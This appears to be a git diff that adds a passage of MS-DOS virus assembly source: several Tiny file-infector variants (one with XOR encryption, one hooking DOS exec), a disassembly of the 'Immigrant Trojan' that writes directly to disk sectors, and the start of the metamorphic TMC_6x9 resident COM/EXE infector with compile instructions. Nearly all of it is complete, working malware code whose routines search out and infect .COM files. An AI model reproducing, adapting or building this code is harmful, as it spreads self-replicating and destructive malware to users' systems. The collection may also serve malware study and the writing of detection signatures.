[SI+blnkdat],DX ; " " " " " " + SUB CX,CX ; " " " " " " (0 here) + NOP + MOV AX,4200H ; move file + INT 21H ; do it! + MOV DX,DI ; set dest index to area for buffer (?) + MOV CX,0002H ; two bytes + NOP + MOV AH,3FH ; read file + INT 21H ; do it! + CMP WORD PTR [DI],0807H ; check for infection + JE nextfile ; next file if infected + NOP + SUB DX,DX ; clear regs + SUB CX,CX ; " " + MOV AX,4202H ; move file pointer + INT 21H ; do it! + CMP DX,00H ; new pointer location 0? + NOP + JNE nextfile ; if no then next file + CMP AH,0FEH ; new pointer loc too high? + JNC nextfile ; yes, try again + MOV [SI+offset endprog+3],AX; point to data + NOP + MOV AH,40H ; write instruction + LEA DX,[SI+0105H] ; write buffer loc | + MOV CX,offset endprog-105h ; (size of virus) --\|/-- + INT 21H ; do it! + JC exit ; error, bug out + MOV AX,4200H ; move pointer + NOP + SUB CX,CX ; clear reg + MOV DX,OFFSET H00001 ; where to set pointer + NOP + INT 21H ; do it! + MOV AH,40H ; write to file + LEA DX,[SI+offset endprog+3]; write data at SI+1AB + NOP + MOV CX,0002H ; two bytes (the JMP) + INT 21H ; do it! +exit: + MOV AH,3EH ; close file + INT 21H ; do it! +nofile: + JMP BP ; go to original file +mnprg ENDP +program ENDP +blnkdat LABEL WORD + DW 0000H +fspec LABEL WORD + DB '*.COM' + DB 0 +endprog LABEL WORD +tinyv ENDS + END program diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-c.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-c.asm new file mode 100644 index 00000000..1c657a4b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-c.asm @@ -0,0 +1,101 @@ + PAGE ,132 +tinyv SEGMENT BYTE PUBLIC 'code' + ASSUME CS:tinyv + ASSUME SS:tinyv + ASSUME DS:tinyv +H00000 DB 0 +H00001 DB 255 DUP(?) +program PROC FAR + ASSUME ES:tinyv +begin: + JMP pgstart ; start program +exlbl LABEL BYTE + db 0CDh, 20h, 7, 8, 9 +pgstart: + CALL tinyvir +mnprg PROC NEAR +tinyvir: + POP SI ; get SI for storage + SUB SI,offset tinyvir ; reset SI to virus start + MOV BP,[SI+blnkdat] ; store SI in BP for return + ADD BP,offset exlbl ; Add to get original offset + + LEA DX,[SI+fspec] ; get filespec (*.COM) + SUB CX,CX ; || (clear regs) + MOV AH,4EH ; || (find files) +mainloop: ; \||/ + INT 21H ; ----\/---- + JC hiccup ; no more files found, terminate virus + MOV DX,009EH ; set file name pointer + MOV AX,3D02H ; open file + INT 21H ; do it! + MOV BX,AX ; move file handle to BX + MOV AH,3FH ; read file + LEA DX,[SI+endprog] ; load end of program (as buffer pntr) + MOV DI,DX ; set Dest Index to area for buffer (?) + MOV CX,0003H ; read 3 bytes + INT 21H ; do it! + CMP BYTE PTR [DI],0E9H ; check for JMP at start + JE infect ; If begins w/JMP, Infect +nextfile: + MOV AH,4FH ; set int 21 to find next file + JMP mainloop ; next file, do it! +hiccup: JMP nofile +infect: + MOV AX,5700h ; get date function + INT 21h ; do it! + PUSH DX ; store date + time + PUSH CX + MOV DX,[DI+01H] ; set # of bytes to move + MOV [SI+blnkdat],DX ; " " " " " " + SUB CX,CX ; " " " " " " (0 here) + MOV AX,4200H ; move file + INT 21H ; do it! + MOV DX,DI ; set dest index to area for buffer (?) + MOV CX,0002H ; two bytes + MOV AH,3FH ; read file + INT 21H ; do it! + CMP WORD PTR [DI],0807H ; check for infection + JE nextfile ; next file if infected + SUB DX,DX ; clear regs + SUB CX,CX ; " " + MOV AX,4202H ; move file pointer + INT 21H ; do it! + CMP DX,00H ; new pointer location 0? + JNE nextfile ; if no then next file + CMP AH,0FEH ; new pointer loc too high? + JNC nextfile ; yes, try again + MOV [SI+offset endprog+3],AX; point to data + MOV AH,40H ; write instruction + LEA DX,[SI+0105H] ; write buffer loc | + MOV CX,offset endprog-105h ; (size of virus) --\|/-- + INT 21H ; do it! + JC exit ; error, bug out + MOV AX,4200H ; move pointer + SUB CX,CX ; clear reg + MOV DX,OFFSET H00001 ; where to set pointer + INT 21H ; do it! + MOV AH,40H ; write to file + LEA DX,[SI+offset endprog+3]; write data at SI+1AB + MOV CX,0002H ; two bytes (the JMP) + INT 21H ; do it! + MOV AX,5701h ; store date + POP CX ; restore time + POP DX ; restore date + INT 21h ; do it! +exit: + MOV AH,3EH ; close file + INT 21H ; do it! +nofile: + + JMP BP ; go to original file +mnprg ENDP +program ENDP +blnkdat LABEL WORD + DW 0000H +fspec LABEL WORD + DB '*.COM' + DB 0 +endprog LABEL WORD +tinyv ENDS + END program diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-f.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-f.asm new file mode 100644 index 00000000..5fafe9a8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-f.asm @@ -0,0 +1,182 @@ +tinyv SEGMENT BYTE PUBLIC 'code' + ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv + + ORG 100h + +DOS EQU 21h + +start: JMP pgstart +exlbl: db 0CDh, 20h, 7, 8, 9 +pgstart:CALL tinyvir +tinyvir: + POP SI ; get SI for storage + SUB SI,offset tinyvir ; reset SI to virus start + MOV BP,[SI+blnkdat] ; store SI in BP for return + ADD BP, OFFSET exlbl + CALL endecrpt + JMP SHORT realprog + +;----------------------------------------------------------------------------- +; nonencrypted subroutines start here +;----------------------------------------------------------------------------- + +; PCM's encryption was stupid, mine is better - Dark Angel +endecrpt: +; Only need to save necessary registers - Dark Angel + PUSH AX ; store registers + PUSH BX + PUSH CX + PUSH SI +; New, better, more compact encryption engine + MOV BX, [SI+EN_VAL] + ADD SI, offset realprog + MOV CX, endenc - realprog + SHR CX, 1 + JNC start_encryption + DEC SI +start_encryption: + MOV DI, SI +encloop: + LODSW ; DS:[SI] -> AX + XOR AX, BX + STOSW + LOOP encloop + + POP SI ; restore registers + POP CX + POP BX + POP AX + RET +;-----end of encryption routine +nfect: + CALL endecrpt + MOV [SI+offset endprog+3],AX; point to data + MOV AH,40H ; write instruction + LEA DX,[SI+0105H] ; write buffer loc | + MOV CX,offset endprog-105h ; (size of virus) --\|/-- + INT DOS ; do it! + PUSHF + CALL endecrpt + POPF + JC outa1 ; error, bug out + RET +outa1: + JMP exit + + +;----------------------------------------------------------------------------- +; Unencrypted routines end here +;----------------------------------------------------------------------------- +realprog: + CLD ; forward direction for string ops +; Why save DTA? This part killed. Saves quite a few bytes. Dark Angel +; Instead, set DTA to SI+ENDPROG+131h + MOV AH, 1Ah ; Set DTA + LEA DX, [SI+ENDPROG+131h] ; to DS:DX + INT 21h + + LEA DX,[SI+fspec] ; get filespec (*.COM) + XOR CX, CX ; || (clear regs) + MOV AH,4EH ; || (find files) +mainloop: ; \||/ + INT DOS ; ----\/---- + JC hiccup ; no more files found, terminate virus +; Next part had to be changed to account for new DTA address - Dark Angel + LEA DX, [SI+ENDPROG+131h+30]; set file name pointer + ; (offset 30 is DTA filename start) + MOV AX,3D02H ; open file + INT DOS ; do it! + MOV BX,AX ; move file handle to BX + MOV AH,3FH ; read file + LEA DX,[SI+endprog] ; load end of program (as buffer pntr) + MOV DI,DX ; set Dest Index to area for buffer + MOV CX,0003H ; read 3 bytes + INT DOS ; do it! + CMP BYTE PTR [DI],0E9H ; check for JMP at start + JE infect ; If begins w/JMP, Infect +nextfile: + MOV AH,4FH ; set int 21 to find next file + JMP mainloop ; next file, do it! +hiccup: JMP exit +infect: + MOV AX,5700h ; get date function + INT DOS ; do it! + PUSH DX ; store date + time + PUSH CX + MOV DX,[DI+01H] ; set # of bytes to move + MOV [SI+blnkdat],DX ; " " " " " " +; Tighter Code here - Dark Angel + XOR CX,CX ; " " " " " " (0 here) + MOV AX,4200H ; move file + INT DOS ; do it! + MOV DX,DI ; set dest index to area for buffer + MOV CX,0002H ; two bytes + MOV AH,3FH ; read file + INT DOS ; do it! + CMP WORD PTR [DI],0807H ; check for infection + JE nextfile ; next file if infected +getaval: ; encryption routine starts here +; My modifications here - Dark Angel + MOV AH, 2Ch ; DOS get TIME function + INT DOS ; do it! + OR DX, DX ; Is it 0? + JE getaval ; yeah, try again + MOV word ptr [si+offset en_val], DX ; Store it +; Tighter code here - Dark Angel + XOR DX,DX ; clear regs + XOR CX,CX ; " " + MOV AX,4202H ; move file pointer + INT DOS ; do it! + OR DX,DX ; new pointer location 0? + JNE nextfile ; if no then next file + CMP AH,0FEH ; new pointer loc too high? + JNC nextfile ; yes, try again + CALL nfect + MOV AX,4200H ; move pointer + XOR CX, CX ; clear reg + MOV DX,OFFSET 00001 ; where to set pointer + INT DOS ; do it! + MOV AH,40H ; write to file + LEA DX,[SI+offset endprog+3]; write data at SI+BUFFER + MOV CX,0002H ; two bytes (the JMP) + INT DOS ; do it! + MOV AX,5701h ; store date + POP CX ; restore time + POP DX ; restore date + INT DOS ; do it! +exit: + MOV AH,3EH ; close file + INT DOS ; do it! + +; Return DTA to old position - Dark Angel + + MOV AH, 1Ah ; Set DTA + MOV DX, 80h ; to PSP DTA + INT 21h + + JMP BP + +;----------------------------------------------------------------------------- +; encrypted data goes here +;----------------------------------------------------------------------------- + +fspec LABEL WORD + DB '*.COM',0 +nondata DB 'Tiny-F version 1.1' ; Program identification + DB '@&' ; author identification + DB 'Released 10-19-91' ; release date +endenc LABEL BYTE ; end of encryption zone +;----------------------------------------------------------------------------- +; nonencrypted data goes anywhere after here +;----------------------------------------------------------------------------- + +blnkdat LABEL WORD + DW 0000H + +; Only en_val is needed now because of new encryption mechanism +en_val DW 0h + +endprog LABEL WORD +tinyv ENDS + END start + diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny.asm b/MSDOS/Virus.MSDOS.Unknown.tiny.asm new file mode 100644 index 00000000..e65f88ae --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny.asm @@ -0,0 +1,120 @@ + +PAGE 59,132 + +; +; +; S +; +; Created: 4-Aug-90 +; Version: +; Passes: 9 Analysis Options on: H +; +; +; + +data_2e equ 1ABh ; (946E:01AB=0) + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +s proc far + +start: + jmp loc_1 ; (0108) + db 0CDh, 20h, 7, 8, 9 +loc_1: + call sub_1 ; (010B) + +s endp + +; +; SUBROUTINE +; + +sub_1 proc near + pop si + sub si,10Bh + mov bp,data_1[si] ; (946E:01A0=0) + add bp,103h + lea dx,[si+1A2h] ; Load effective addr + xor cx,cx ; Zero register + mov ah,4Eh ; 'N' +loc_2: + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_6 ; Jump if carry Set + mov dx,9Eh + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + mov ah,3Fh ; '?' + lea dx,[si+1A8h] ; Load effective addr + mov di,dx + mov cx,3 + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + cmp byte ptr [di],0E9h + je loc_4 ; Jump if equal +loc_3: + mov ah,4Fh ; 'O' + jmp short loc_2 ; (0120) +loc_4: + mov dx,[di+1] + mov data_1[si],dx ; (946E:01A0=0) + xor cx,cx ; Zero register + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,di + mov cx,2 + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + cmp word ptr [di],807h + je loc_3 ; Jump if equal + xor dx,dx ; Zero register + xor cx,cx ; Zero register + mov ax,4202h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + cmp dx,0 + jne loc_3 ; Jump if not equal + cmp ah,0FEh + jae loc_3 ; Jump if above or = + mov ds:data_2e[si],ax ; (946E:01AB=0) + mov ah,40h ; '@' + lea dx,[si+105h] ; Load effective addr + mov cx,0A3h + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + jc loc_5 ; Jump if carry Set + mov ax,4200h + xor cx,cx ; Zero register + mov dx,1 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov ah,40h ; '@' + lea dx,[si+1ABh] ; Load effective addr + mov cx,2 + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx +loc_5: + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle +loc_6: + jmp bp ;*Register jump +data_1 dw 0 ; Data table (indexed access) + db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0 +sub_1 endp + + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny133.asm b/MSDOS/Virus.MSDOS.Unknown.tiny133.asm new file mode 100644 index 00000000..ecee24b0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny133.asm @@ -0,0 +1,94 @@ +VSize=085h + +Code Segment + Assume CS:Code + org 0 + db 4Dh + jmp Start + + Org 600h + +Bytes db 0CDh,20h,90h,90h + +Start: mov si, 0100h + mov bx, offset Int21 + mov cx, 0050h + mov di, si + add si, [si+2] + push di + movsw + movsw + mov es, cx + cmpsb + je StartFile + dec si + dec di + rep movsw + mov es, cx + xchg ax, bx + xchg ax, cx +Loop0: xchg ax, cx + xchg ax, word ptr es:[di-120h] + stosw + jcxz Loop0 + xchg ax, bx +StartFile: + push ds + pop es + ret + +Int21: cmp ax, 4B00h + jne End21 +Exec: push ax + push bx + push dx + push ds + push es + mov ax, 3D02h + call DoInt21 + jc EndExec + cbw ;Zero AH + cwd ;Zero DX + mov bx, si ;Move handle to BX + mov ds, ax ;Set DS and ES to 60h, + mov es, ax ;the virus data segment + mov ah, 3Fh ;Read first 4 bytes + int 69h + mov al, 4Dh + scasb ;Check for 4D5Ah or infected file mark + je Close ;.EXE or already infected + mov al, 2 + call LSeek ;Seek to the end, SI now contains file size + mov cl, VSize ;Virus size in CX, prepare to write + int 69h ;AH is 40h, i.e. Write operation + mov ax, 0E94Dh ;Virus header in AX + stosw ;Store it + xchg ax, si ;Move file size in AX + stosw ;Complete JMP instruction + xchg ax, dx ;Zero AX + call LSeek ;Seek to the beginning + int 69h ;AH is 40h, write the virus header +Close: mov ah,3Eh ;Close the file + int 69h +EndExec: pop es + pop ds + pop dx + pop bx + pop ax +End21: jmp dword ptr cs:[69h * 4] + +LSeek: mov ah, 42h ;Seek operation + cwd ;Zero DX +DoInt21: xor cx, cx ;External entry for Open, zero cx + int 69h + mov cl, 4 ;4 bytes will be read/written + xchg ax, si ;Store AX in SI + mov ax, 4060h ;Prepare AH for Write + xor di, di ;Zero DI + ret + +VLen = $ - offset Bytes + +Code EndS +End + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tinyd.asm b/MSDOS/Virus.MSDOS.Unknown.tinyd.asm new file mode 100644 index 00000000..778b9804 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tinyd.asm @@ -0,0 +1,116 @@ +tinyv SEGMENT BYTE PUBLIC 'code' + ASSUME CS:tinyv + ASSUME SS:tinyv + ASSUME DS:tinyv +H00000 DB 0 +H00001 DB 255 DUP(?) +program PROC FAR + ASSUME ES:tinyv +begin: + JMP pgstart ; start program +exlbl LABEL BYTE + db 0CDh, 20h, 7, 8, 9 +pgstart: + CALL tinyvir +mnprg PROC NEAR +tinyvir: + POP SI ; get SI for storage + SUB SI,offset tinyvir ; reset SI to virus start + MOV BP,[SI+blnkdat] ; store SI in BP for return + ADD BP,offset exlbl ; Add to get original offset + + LEA DX,[SI+fspec] ; get filespec (*.COM) + SUB CX,CX ; || (clear regs) + MOV AH,4EH ; || (find files) +mainloop: ; \||/ + INT 21H ; ----\/---- + JC hiccup ; no more files found, terminate virus + MOV DX,009EH ; set file name pointer + MOV AX,3D02H ; open file + INT 21H ; do it! + MOV BX,AX ; move file handle to BX + MOV AH,3FH ; read file + LEA DX,[SI+endprog] ; load end of program (as buffer pntr) + MOV DI,DX ; set Dest Index to area for buffer (?) + MOV CX,0003H ; read 3 bytes + INT 21H ; do it! + CMP BYTE PTR [DI],0E9H ; check for JMP at start + JE infect ; If begins w/JMP, Infect +nextfile: + MOV AH,4FH ; set int 21 to find next file + JMP mainloop ; next file, do it! +hiccup: JMP nofile +infect: + MOV AX,5700h ; get date function + INT 21h ; do it! + PUSH DX ; store date + time + PUSH CX + MOV DX,[DI+01H] ; set # of bytes to move + MOV [SI+blnkdat],DX ; " " " " " " + SUB CX,CX ; " " " " " " (0 here) + MOV AX,4200H ; move file + INT 21H ; do it! + MOV DX,DI ; set dest index to area for buffer (?) + MOV CX,0002H ; two bytes + MOV AH,3FH ; read file + INT 21H ; do it! + CMP WORD PTR [DI],0807H ; check for infection + JE nextfile ; next file if infected + SUB DX,DX ; clear regs + SUB CX,CX ; " " + MOV AX,4202H ; move file pointer + INT 21H ; do it! + CMP DX,00H ; new pointer location 0? + JNE nextfile ; if no then next file + CMP AH,0FEH ; new pointer loc too high? + JNC nextfile ; yes, try again + MOV [SI+offset endprog+3],AX; point to data + MOV AH,40H ; write instruction + LEA DX,[SI+0105H] ; write buffer loc | + MOV CX,offset endprog-105h ; (size of virus) --\|/-- + INT 21H ; do it! + JC exit ; error, bug out + MOV AX,4200H ; move pointer + SUB CX,CX ; clear reg + MOV DX,OFFSET H00001 ; where to set pointer + INT 21H ; do it! + MOV AH,40H ; write to file + LEA DX,[SI+offset endprog+3]; write data at SI+1AB + MOV CX,0002H ; two bytes (the JMP) + INT 21H ; do it! + MOV AX,5701h ; store date + POP CX ; restore time + POP DX ; restore date + INT 21h ; do it! +exit: + MOV AH,2Ah ; date function + INT 21h ; do it! + CMP AL,0h ; is it sunday? + JNE closal ; nope, quit + CMP DH,6h ; is it June? + JNE closal ; nope, quit + PUSH BX + PUSH SI + MOV AH,9h ; print string + MOV DX, OFFSET nondata ; string to print + ADD DX,SI + INT 21h ; print it + MOV DX, OFFSET nondat2 ; next string + ADD DX, SI + INT 21h ; print it! + POP BX +closal: MOV AH,3EH ; close file + INT 21H ; do it! +nofile: JMP BP ; go to original file +mnprg ENDP +program ENDP +blnkdat LABEL WORD + DW 0000H +fspec LABEL WORD + DB '*.COM' + DB 0 +nondata DB 'Tiny-D version 1.1$ '; Program identification +nondat2 DB ' by @&$' ; author identification +endprog LABEL WORD +tinyv ENDS + END program diff --git a/MSDOS/Virus.MSDOS.Unknown.tit.asm b/MSDOS/Virus.MSDOS.Unknown.tit.asm new file mode 100644 index 00000000..9657ebe9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tit.asm @@ -0,0 +1,310 @@ +>>> Article From Evolution #1 - YAM '92 + +Article Title: The Immigrant Trojan Disassembly +Author: Natas Kaupas + + +;***************************************************************************** +; Dissasembly of The Immigrant Trojan (TIT) +; Dissasembly by Dark Angel +; +; Just save this and compile it with TASM. +;***************************************************************************** + +PAGE 59,132 + +data_6e equ 2000h ; (0010:2000=89h) +data_8e equ 0Ch ; (8096:000C=0) +data_10e equ 87F8h ; (8096:87F8=0) +data_11e equ 0CDF3h ; (8096:CDF3=0) + +; Tasm 1.00 will output an extra NOP (90h) on forward memory references +; if the segment is declared after the reference. Segments are declared +; prior to any code to allow re-assembly. + +seg_B segment byte public +seg_B ends + +seg_C segment byte public +seg_C ends + + +;-------------------------------------------------------------- seg_a ---- + +seg_a segment byte public + assume cs:seg_a , ds:seg_a , ss:stack_seg_c + + db 0FDh,0FFh, 00h,0FFh,0F8h, 0Eh + db 0B8h, 05h, 00h, 8Eh,0D8h,0BDh + db 01h, 00h,0BAh, 0Dh, 00h,0B4h + db 0FFh,0FFh + db 9 + db 0CDh, 21h, 80h, 3Eh, 0Ch, 00h + db 1Ah, 7Dh, 19h,0B4h, 05h,0B5h + db 00h,0B6h, 00h,0E1h, 79h, 8Ah + db 16h,0F3h,0CDh, 13h,0BAh, 6Ah + db 0E6h,0FEh, 06h,0F8h, 87h,0F3h + db 0EBh,0E0h,0B0h, 02h +loc_2: + mov cx,2BCh + mov dx,0FFC9h + stc ; Set carry flag + mov ds,[di+63h] + mov bx,[di+37h] + int 26h ; Absolute disk write, drive al + mov dx,0E326h + mov ax,0F000h + dec word ptr [si-5] + add [bp+si],al + or ax,440Ah + db 65h, 63h, 6Fh, 64h, 69h, 6Eh + db 0FFh, 7Fh + db 'g system files $' + db 0F8h, 7Fh,0E7h + db 'Ya', 27h, ' been hit' + db 0F8h,0FFh,0F7h + db 'y The Immigr' + db 0E1h, 21h, 61h, 6Eh,0EFh, 54h + db 72h, 6Fh, 6Ah,0F8h, 20h,0CEh + db 0C3h,0C4h, 65h, 64h,0E2h, 6Fh + db 78h,0C3h + db 69h + +locloop_3: + jmp bx ;*Register jump + db 'a. [C.S.A.]' + db 0BEh, 2Eh, 02h, 00h, 24h, 00h + db 0F0h + db 13 dup (0) + +seg_a ends + + + +;-------------------------------------------------------------- seg_b ---- + +seg_b segment byte public + assume cs:seg_b , ds:seg_b , ss:stack_seg_c + + db 10h, 00h +data_13 dw 0 +data_14 dw 100h +data_15 dw 0Ch +data_16 dw 0Ch +data_17 dw 12h +data_18 dw 15Ch + +; +; +; Program Entry Point +; +; + + +tit proc far + +start: + push es + push cs + pop ds + mov cx,data_18 ; (80B2:000C=15Ch) + mov si,cx + dec si + mov di,si + mov bx,ds + add bx,data_17 ; (80B2:000A=12h) + mov es,bx + std ; Set direction flag + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + push bx + mov ax,2Bh + push ax + retf + mov bp,cs:data_16 ; (80B2:0008=0Ch) + mov dx,ds +loc_6: + mov ax,bp + cmp ax,1000h + jbe loc_7 ; Jump if below or = + mov ax,1000h +loc_7: + sub bp,ax + sub dx,ax + sub bx,ax + mov ds,dx + mov es,bx + mov cl,3 + shl ax,cl ; Shift w/zeros fill + mov cx,ax + shl ax,1 ; Shift w/zeros fill + dec ax + dec ax + mov si,ax + mov di,ax + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + or bp,bp ; Zero ? + jnz loc_6 ; Jump if not zero + cld ; Clear direction + mov es,dx + mov ds,bx + xor si,si ; Zero register + xor di,di ; Zero register + mov dx,10h + lodsw ; String [si] to ax + mov bp,ax +loc_8: + shr bp,1 ; Shift w/zeros fill + dec dx + jnz loc_9 ; Jump if not zero + lodsw ; String [si] to ax + mov bp,ax + mov dl,10h +loc_9: + jnc loc_10 ; Jump if carry=0 + movsb ; Mov [si] to es:[di] + jmp short loc_8 ; (0069) +loc_10: + xor cx,cx ; Zero register + shr bp,1 ; Shift w/zeros fill + dec dx + jnz loc_11 ; Jump if not zero + lodsw ; String [si] to ax + mov bp,ax + mov dl,10h +loc_11: + jc loc_14 ; Jump if carry Set + shr bp,1 ; Shift w/zeros fill + dec dx + jnz loc_12 ; Jump if not zero + lodsw ; String [si] to ax + mov bp,ax + mov dl,10h +loc_12: + rcl cx,1 ; Rotate thru carry + shr bp,1 ; Shift w/zeros fill + dec dx + jnz loc_13 ; Jump if not zero + lodsw ; String [si] to ax + mov bp,ax + mov dl,10h +loc_13: + rcl cx,1 ; Rotate thru carry + inc cx + inc cx + lodsb ; String [si] to al + mov bh,0FFh + mov bl,al + jmp locloop_15 ; (00BB) +loc_14: + lodsw ; String [si] to ax + mov bx,ax + mov cl,3 + shr bh,cl ; Shift w/zeros fill + or bh,0E0h + and ah,7 + jz loc_16 ; Jump if zero + mov cl,ah + inc cx + inc cx + +locloop_15: + mov al,es:[bx+di] + stosb ; Store al to es:[di] + loop locloop_15 ; Loop if cx > 0 + + jmp short loc_8 ; (0069) +loc_16: + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_18 ; Jump if zero + cmp al,1 + je loc_17 ; Jump if equal + mov cl,al + inc cx + jmp short locloop_15 ; (00BB) +loc_17: + mov bx,di + and di,0Fh + add di,data_6e ; (0010:2000=89h) + mov cl,4 + shr bx,cl ; Shift w/zeros fill + mov ax,es + add ax,bx + sub ax,200h + mov es,ax + mov bx,si + and si,0Fh + shr bx,cl ; Shift w/zeros fill + mov ax,ds + add ax,bx + mov ds,ax + jmp loc_8 ; (0069) + db 41h, 43h, 2Dh, 44h, 43h +loc_18: + push cs + pop ds + mov si,offset data_19 ; (80B2:0158=11h) + pop bx + add bx,10h + mov dx,bx + xor di,di ; Zero register +loc_19: + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_21 ; Jump if zero + mov ah,0 +loc_20: + add di,ax + mov ax,di + and di,0Fh + mov cl,4 + shr ax,cl ; Shift w/zeros fill + add dx,ax + mov es,dx + add es:[di],bx + jmp short loc_19 ; (0109) +loc_21: + lodsw ; String [si] to ax + or ax,ax ; Zero ? + jnz loc_22 ; Jump if not zero + add dx,0FFFh + mov es,dx + jmp short loc_19 ; (0109) +loc_22: + cmp ax,1 + jne loc_20 ; Jump if not equal + mov ax,bx + mov di,data_14 ; (80B2:0004=100h) + mov si,data_15 ; (80B2:0006=0Ch) + add si,ax + add data_13,ax ; (80B2:0002=0) + sub ax,10h + mov ds,ax + mov es,ax + xor bx,bx ; Zero register + cli ; Disable interrupts + mov ss,si + mov sp,di + sti ; Enable interrupts + jmp dword ptr cs:[bx] ;* +data_19 db 11h + db 0, 1, 0 + db 292 dup (0) + +tit endp + +seg_b ends + + + +;--------------------------------------------------------- stack_seg_c --- + + stack_seg_c segment word stack 'STACK' + + db 128 dup (0) + +stack_seg_c ends + + end start + + diff --git a/MSDOS/Virus.MSDOS.Unknown.tmc_6x9.asm b/MSDOS/Virus.MSDOS.Unknown.tmc_6x9.asm new file mode 100644 index 00000000..5b5d538b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tmc_6x9.asm @@ -0,0 +1,4787 @@ +comment * + TMC_6x9 + Disassembly by + Super/29A and Darkman/29A + + + + TMC_6x9 is a 5393 bytes resident appending COM and EXE virus. Infects at + open file, close file and load and/or execute program. TMC_6x9 has an error + handler, retro structures and is metamorphic in file and memory using Tiny + Mutation Compiler v 1.00 [TMC]. + + To compile TMC_6x9 with Turbo Assembler v 5.0 type: + TASM /M TMC_6X9.ASM + TLINK /x TMC_6X9.OBJ + EXE2BIN TMC_6X9.EXE TMC_6X9.COM +* + +.model tiny +.code + +code_begin: + db 10001101b,00101110b ; LEA BP,[imm16] (opcode 8dh,2eh) + dw 100h ; Delta offset + + cld ; Clear direction flag + mov ax,ds ; AX = segment of PSP for current ... + mov [bp+program_seg],ax ; Store segment of PSP for current... + + dec ax ; AX = segment of current Memory C... + mov ds,ax ; DS = segment of current Memory C... + mov ax,ds:[03h] ; AX = size of memory block in par... + + cmp ax,1900h ; Insufficient memory? + jae resize_mem ; Above or equal? Jump to resize_mem + + jmp terminate +resize_mem: + push cs ; Save CS at stack + pop ds ; Load DS from stack (CS) + + mov [bp+mcb_size_],ax ; Store size of memory block in p... + + mov bx,[bp+new_mcb_size] + mov ah,4ah ; Resize memory block + int 21h + jnc allocate_mem ; No error? Jump to allocate_mem + + jmp terminate +allocate_mem: + mov ah,48h ; Allocate memory + + mov bx,[bp+mcb_size_] ; BX = size of memory block in par... + sub bx,[bp+new_mcb_size] + dec bx ; BX = number of paragraphs to all... + cmp bx,267h ; Insufficient memory? + jae allocat_mem ; Above or equal? Jump to allocat_mem + + jmp terminate +allocat_mem: + int 21h + jnc initiali_tmc ; No error? Jump to initiali_tmc + + jmp terminate +initiali_tmc: + mov es,ax ; ES = segment of allocated memory + add es:[02h],6942h ; Store 16-bit random number + mov word ptr es:[0ch],00h + mov es:[04h],118h ; Store offset of block information + mov es:[06h],2c8h ; Store offset of CALL; JMP; Jcc i... + mov es:[08h],5a8h ; Store offset of data information + + lea si,[bp+tmc_table] ; SI = offset of tmc_table + + push si ; Save SI at stack + + mov bx,730h ; BX = offset of next virus genera... + + jmp initial_tmc +initial_tmc: + mov di,10h ; DI = offset of table of blocks + xor ax,ax ; Zero AX + + jmp tmc_ini_loop +tmc_ini_loop: + add si,ax ; SI = offset of block or instruct... + call decrypt_byte + or al,al ; End of table? + jz calc_blocks ; Zero? Jump to calc_blocks + nop + nop + nop + + cmp al,11101000b ; CALL; JMP; Data reference; Jcc? + jae exam_block ; Above or equal? Jump to exam_block + nop + nop + nop + + cmp al,10h ; Data? + jbe tmc_ini_loop ; Below or equal? Jump to tmc_ini_... + nop + nop + nop + + sub al,10h ; AL = length of data + + jmp tmc_ini_loop +exam_block: + cmp al,11101111b ; End of block? + jne exam_block_ ; Not equal? Jump to exam_block_ + nop + nop + nop + + mov al,00h ; Don't add anything to offset wit... + + jmp tmc_ini_loop +exam_block_: + cmp al,11101110b ; Beginning of block? + jne next_byte ; Not equal? Jump to next_byte + nop + nop + nop + + mov ax,si ; AX = offset of block identification + dec ax ; AX = offset of block within table + stosw ; Store offset of block within table + + mov ax,0ffffh ; Block is still in one part + stosw ; Store block identification + + mov ax,02h ; Add two to offset within table + + jmp tmc_ini_loop +next_byte: + mov al,02h ; Add two to offset within table + + jmp tmc_ini_loop +calc_blocks: + lea ax,[di-10h] ; AX = number of blocks multiplied... + shr ax,01h ; Divide number of blocks by two + shr ax,01h ; Divide number of blocks by two + mov es:[0ah],ax ; Store number of blocks + + xor ax,ax ; End of table + stosw ; Store end of table + + mov di,10h ; DI = offset of table of blocks + mov si,es:[di] ; SI = offset of block within table + + jmp exam_bloc +split_block: + push bp ; Save BP at stack + mov bp,es:[0ah] ; BP = number of blocks + call rnd_in_range + pop bp ; Load BP from stack + + shl ax,01h ; Multiply random number with two + shl ax,01h ; Multiply random number with two + add ax,10h ; Add ten to random number + + mov di,ax ; DI = random offset within table + + jmp exam_nxt_blo +exam_nxt_blo: + add di,04h ; DI = offset of next offset withi... + + mov si,es:[di] ; SI = offset of next block within... + or si,si ; End of table? + jnz exam_block__ ; Not 